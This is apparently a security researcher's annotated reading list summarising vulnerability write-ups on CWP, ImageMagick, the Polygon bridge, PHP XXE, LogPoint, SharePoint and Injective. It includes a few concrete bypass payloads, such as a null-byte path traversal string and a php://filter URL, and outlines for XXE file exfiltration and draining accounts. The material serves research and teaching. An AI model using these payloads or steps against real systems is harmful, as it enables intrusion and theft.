Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

CVE-2021-45467: CWP CentOS Web Panel - preauth RCE- 1943

pwn.ai    Reference →Posted 1 Day Ago
  • While reviewing CentOS Web Panel (CWP), they noticed an interesting protection for local file inclusion.
    PHP
    function GETSecurity($variable)
    {
      if (stristr($variable, ".." ) {
         exit("hacking attempt");
      }
    }
    
  • Why was this interesting to them? stristr() is a substring function that isn't case sensitive. They had a few ideas for circumventing this check... First, have it treat other characters as dots but this yielded nothing.
  • Second, was finding characters that the C PHP processor would treat as dots when lower-cased. They reviewed the underlying C code to see that any inputs was converted to lowercase, and then the comparison was performed. The main idea was that the check and the use were slightly different but this didn't yield any results.
  • The final idea was tricking CWP into thinking that dots were NOT being used at all. After some fuzzing, they came to the payload /.%00./. The string comparison saw one thing but the routing saw another. stristr effectively ignores null bytes but they were not sure why this happened.
  • This vulnerability gave them a local file inclusion vulnerability. They reported this to ZDI and patched. Overall, a good bug! I appreciated the thought process of why they targeted this specific section of code, including the failures.

ImageMagick: From Arbitrary File Read to File Write In Every Policy (ZeroDay)- 1942

pwn.ai    Reference →Posted 1 Day Ago
  • The author of this post is the creator of an autopwn bot. While on a customer engagement with a small scope that was perfectly patched, it decided to tackle a dependency that is used by millions of websites: imagemagick. After five days of searching, it had a zero-day RCE bug in the default configuration of this library. This is the story of the vulnerabilities and the disclosure process.
  • On the first day, it learned that extension-based filtering doesn't work because it mostly cares about magic bytes. From this, it was determined that it could process SVGs at will, and the SVG parser was reviewed. Fairly quickly, it identified a file-read vulnerability when PostScript was enabled, but exploiting it required a very generous policy. The default policy blocks PS but not EPSI, allowing for an arbitrary file read. There are two issues here: the ability to read files at all and a bad deny-list.
  • After another day, it learned that by shifting the magic bytes, adding a \n could be used to defeat the PostScript detection. So, using GhostScript, you could write arbitrary files to the server just by reading a file. After finding a clear RCE vulnerability via a file-write, the development team pushed back, saying that real users should have better policies in place, where the default configuration still had the issue.
  • After this point, they moved their client to a very restrictive set of image policies. Upon doing this, the AI bot realized that the PS module was blocked but NOT the PDF module. By using the PDF path, which is fine in production according to the maintainers, it achieves RCE again. Even after this, they found that using the magic bytes C5 D0 D3 C6 overrode the extension-based format selection, allowing for even jpgs to be processed.
  • The most secure policy blocked all usage of delegates. This should theoretically catch all external process invocations and reject them. Unfortunately, this protection was busted in the case of GhostScript. When GhostScript is compiled into ImageMagick as a library, it runs in-process via gsapi_init_with_args(). So, the policy check never fires.
  • WordPress has no ImageMagick policy to begin with, making it vulnerable in many situations. It all depends on the website and the user's capabilities. In the end, the module was silently fixed without a CVE being assigned, and the fix wasn't backported to older versions. Practically, this means that a server with defaults of the library is vulnerable to some pretty nasty things. Only the core file read and file write issues were fixed; the PDF bypass and gslib delegate execution issue were never fixed.
  • The maintainers' fixation on secure policies appears to be a security boundary that is different between real-world usage and maintainer expectations. As usual, if there are no good defaults, then the protection is effectively null. Overall, a great post on ImageMagick's security and the use of LLMs to find bugs.

Tricking the Polygon bridge into withdrawals by forging transaction proofs- 1941

Hexens    Reference →Posted 1 Day Ago
  • Polygon is an EVM-L2 solution. It has multiple bridges to go to and from Polygon/Ethereum. One of these is the Plasma bridge, which uses transaction receipts to prove incoming/outgoing transaction information for token transfers. The user just needs to provide a proof of a withdraw event of the token on Polygon to obtain it. This event contains the amount and receiver of the transfer inside of it.
  • The proving process is done on a Merkle Patricia State Trie. This is a state trie that encodes data into it, making it searchable, that is used all over the EVM ecosystem. With a valid root hash and the existence proof within the state trie, it's possible to prove that the event happened. This requires that a checkpoint hash of the given block is proven.
  • The first vulnerability is an issue within the MerklePatriciaProof verification library. When providing data against an MPT root hash, it requires the trie's nodes and path. The recipient is an RLP-encoded transaction index. These tries have prefixes that define length extension information. The library enabled early stopping at an extension node by simply providing a shorter proof path. This creates a parsing differential between reality and what the proof sees. By doing this, the 7th parameter in the exit payload is completely controllable!
  • The RLPReader library had a memory corruption issue during parsing. The code has a simple memory pointer and loops over each element. For each element, it adds the length value and copies the data to get the entry. The library blindly trusts the length of a value to be valid, not considering it could go into other memory of the program. As a result, the parser can read beyond the expected bounds into memory.
  • Now we have two issues: an out of bounds read and a parser differential. Without the OOB read, the parser differential is unexploitable because the hash data requires as the value is random and likely cannot be parsed into a valid transaction. To get this to work, the extension node hash must be parsable as a valid receipt, which has a lot of requirements. They wrote a script to search the whole chain history for extension node hashes that would work in this case and did find a few.
  • The parser differential is completely separate from the exploitability of this; we just need a single valid tx for this exploit to work. Once we have the differential, we can use the out of bounds read to perform the exploit. To exploit this, we need Solidity to read from dirty memory (data that hasn't been cleaned up yet) with data that we control. Because of the order of operations, only the ERC20PredicateBurnOnly code was affected; it has a CALL opcode before the parsing that writes data to memory that is controllable. By having the parser read this data, we can control the logs that are processed.
  • This exploit is super clever! It required a small parsing discrepancy to begin with. After this issue occurred, it exploited a bug in the RLPReader library. The developers likely made the reasonable assumption that all data processed by the library would already have been validated. Although this is true, it doesn't account for a bug in the validation. Once you get past the initial validation, the code typically becomes much softer.

Advanced Client Side Hacking- 1940

XSS Doctor & Jason Haddix    Reference →Posted 1 Day Ago
  • Client side security is a little bit opaque to me. This is a course that focuses on practical exploitation of client-side vulnerabilities, and how to chain these types of bugs together for greater impact.

Impossible XXE in PHP- 1939

Aleksandr Zhurnakov - Swarm PT    Reference →Posted 2 Days Ago
  • The code snippet the author shows should prevent XXE in PHP. The usage of external entities is disabled when XML on the first call, but NOT on the second. There are four obstacles:
    1. Entities are set to an empty string during initial XML loading.
    2. Disallows external entities from being loaded into another.
    3. No networking URIs are allowed, such http://.
    4. With XML_DOCUMENT_TYPE_NODE this prevents normal entities from being used.
  • Condition three can be bypassed by using parameter entities. The network issue doesn't actually matter in PHP. This is because it's only used on the initial URI and not in a nested fashion. So, php://filter/resource=http://example.com can be used to bypass this.
  • Condition one prevents the usage of external entity loading out of the gate. The code will remove all external entity references that it sees. It turns out that the SYSTEM attribute is parsed for the DOCTYPE tag. If the code is within the brackets, it is NOT removed on the first parse. This means the second parse will include XXE. This happens because the DOCTYPE is considered part of the structural definition and shouldn't be touched.
  • The final bypass is the impact. How do we extract files? Parameter Entities are defined on the same page and used on that page. Parameter entities are expanded in libxml2 in PHP with a different set of rules when LIBXML_DTDLOAD is enabled. Additionally, the loading time is interesting. The parameters are expanded before the usage of anything else.
  • So, the final payload is as follows:
    1. Create a parameter entity that loads a file.
    2. Create a new entity that references the file in step 1.
    3. The entity is called with a URL that has the entity of step 1 as part of the URL. Because the parameter expansion loads first, this sends the file contents to the server.
  • They found an exploitable path in SimpleSAMLphp and in another undisclosed product. Overall, this is a great post on vulnerability research and skipping past what looks like a "reasonable" defense.

Don’t trust, verify- 1938

Daniel Stenberg    Reference →Posted 2 Days Ago
  • The author of this post is the maintainer of CURL. Their goal is to get users and consumers to verify CURL's software before using it. Why? Because attacks are everywhere and happening all the time.
  • A skilled member of the project team can deliberately add malicious code, such as with the XZ backdoor. A maintainer may be compromised, allowing malicious code to be pushed. A rando may merge a "bugfix" that is actually a small step to a larger chain of pieces planted for a backdoor. A real maintainer may accidentally add code that creates a security vulnerability. Tarballs that cost the code could get hacked. The CI of a third party on the project is hacked and used to exploit the project.
  • Here's the point: you can verify. As the author, they do everything they can each week to improve CURL's code quality. You can review the code for bugs, review the release contents to ensure they are not tainted from the original, and much more.
  • Within the git repo itself, there are many things that can be done, including a list of 21 items the author mentions. Code styling, banning functions that are footguns, code review, banning binary blobs/unicode characters, documentation, fuzzing the code, security audits... There are a lot of things to be done.
  • They finish by saying that this is NOT paranoia; this is what allows them to sleep well at night. They take CURL's code quality and security seriously.

The Story of a Perfect Exploit Chain: Six Bugs That Looked Harmless Until They Became Pre-Auth RCE in a Security Appliance- 1937

mehmetince    Reference →Posted 5 Days Ago
  • The author of this post was evaluating the LogPoint SIEM/SOAR to replace their existing one. Before doing this, they decided to review it for vulnerabilities and immediately found three serious issues. Months later, they returned to look into deeper issues. Upon reviewing the source code, they found an interesting quirk: half of it ran natively while the other half ran in un-network-constrained Docker containers. This was because it was initially ONLY a SIEM but had to transition into a SOAR. The SOAR code runs in a Dockerized setup while the SIEM runs natively.
  • This led to two Nginx configurations: an external one for routing traffic and a Dockerized setup for routing traffic to the various microservices. Using the rewrite rules in the internal Nginx configuration, it's possible to hit some internal routes. This dramatically increases the attack surface.
  • The JWT verification on the SOAR backend has a hard-coded JWT secret. After using this JWT to login, an API key is returned. This is sometimes used for authentication between microservices. Upon review, there is a single API key being returned for the user secbi. This is a high-privilege SOAR account that comes bundled with the installation. Perfect! This allows for an anonymous user to call any of the SOAR endpoints on the LogPoint backend.
  • The new goal was to jump from the containerized application to the legacy backend. They found an endpoint that returned a separate secret key for the SOAR endpoint interacting with the legacy Python backend. If they could make a request to this, they could interact with the Python backend. Naturally, they found a GET-based SSRF on a configuration test. This could be used to find the secrets described above.
  • On the Python-backend code, the found a simply eval() being done on the rules engine. This is only possible if they can create an alert with a payload for evaluation within the trigger_value. They need to find a way to create a rule that can specifically do this now. Luckily for them, there's a rule importer that bypasses most validation.
  • A pretty solid chain of issues that were mostly authentication-related. It was a fun read for six bugs to eventually find RCE.

How We Broke Exchanges: A Deep Dive Into Authentication And Client-Side Bugs- 1936

OtterSec    Reference →Posted 7 Days Ago
  • A common OAuth misconfiguration is allowlisting localhost for development purposes. When enabled in production, this can lead to an application running on the device to steal OAuth codes via redirects to itself. The same issue could appear with CORS.

SharePoint ToolShell – One Request PreAuth RCE Chain- 1935

viettel    Reference →Posted 7 Days Ago
  • The first vulnerability that the author found was a deserialization vulnerability. In SharePoint, there is arbitrary deserialization of DataSet and DataTable in some functions. Because DataSet is a well-known gadget in ysoserial, Microsoft has a filtering mechanism. It will strip out all other serialization information except for XmlSchema and XmlDiffGram.
  • The type validation doesn't allow for anything besides a simple type allowlist. However, this validation doesn't work on nested types, such as a type within an array. This allows for bypassing the allowlist check and getting RCE via known deserialization bugs. This attack requires authentication. So, the author started looking for ways to trigger this functionality without auth. SharePoint appears to have generalized auth, and page-level auth to circumvent.
  • It's possible to trigger simple ToolPane functionality to reach this. First, if the Referrer is set to a specific value, then it bypasses authentication. Next, they need to trigger the vulnerability prior to the page verificatoin from occuring on the Load() event. Byb combining the usage of ToolPane and SPWebPartManager, an attacker can force SharePoint to trigger the vulnerable code prior to the full ASP.NET lifecycle taking place. All of this was just reverse-engineering the application and seeing which paths could be hit.
  • The rest of the blog post is slightly hard to follow. Regardless, it's an interesting look into the ASP.NET and SharePoint security world. The bug is super impactful and a cool Pwn2Own entry.

One Missing Check, $500M at Risk: MsgBatchUpdateOrders Let Anyone Drain Any Account on Injective- 1934

al-f4lc0n    Reference →Posted 7 Days Ago
  • Injective is a Cosmos-based blockchain that includes an EVM runtime, in addition to the regular Cosmos features. It contains a subaccount module in which the account must be owned by the transaction signer.
  • The sub-account check actually ensures that the signer owns the specified sub-account. However, in the batching code within MsgBatchUpdateOrders, this check is not performed on three order types. This allows for complete circumvention of the security protection and gives attackers the ability to impersonate users on their operations.
  • To exploit this, an attacker would do the following:
    1. Create a worthless token.
    2. Create a spot market with FAKE/USDT.
    3. Place a sell order for FAKE/USDT. This will sell their worthless token for a valuable token.
    4. Use the vulnerability to force the victim to market buy the fake token. The attacker ends up with the valuable token.
    5. Bridge out of Injective to Ethereum with the USDT.
  • The vulnerability appears straightforward, but the aftermath wasn't. The vulnerability was submitted on November 30th, 2025. On December 1st, they fixed the issue. After a while, the white hat asked for a follow-up but got nothing until February 11th, when they confirmed its validity. On March 5th, the bug bounty program offered a $50K bounty instead of the whitehats' expected maximum payout of $500K.
  • The impact of $500M seems off to me. At the time of writing, Injective's TVL is about $12M, so I don't know where the $500M comes from. Other than this, the statements from a now-deleted tweet from Injective seem pretty off. The whitehat responded in a Tweet as well. From changing conditions later to unresponsiveness, this seemed pretty bad. Immunefi paused Injective's bug bounty program for the time being.
  • Overall, a pretty simple vulnerability that had a tremendous impact. In a bear market, it's hard to get paid for your bugs, though. I feel for the whitehat, if all of the claims are accurate.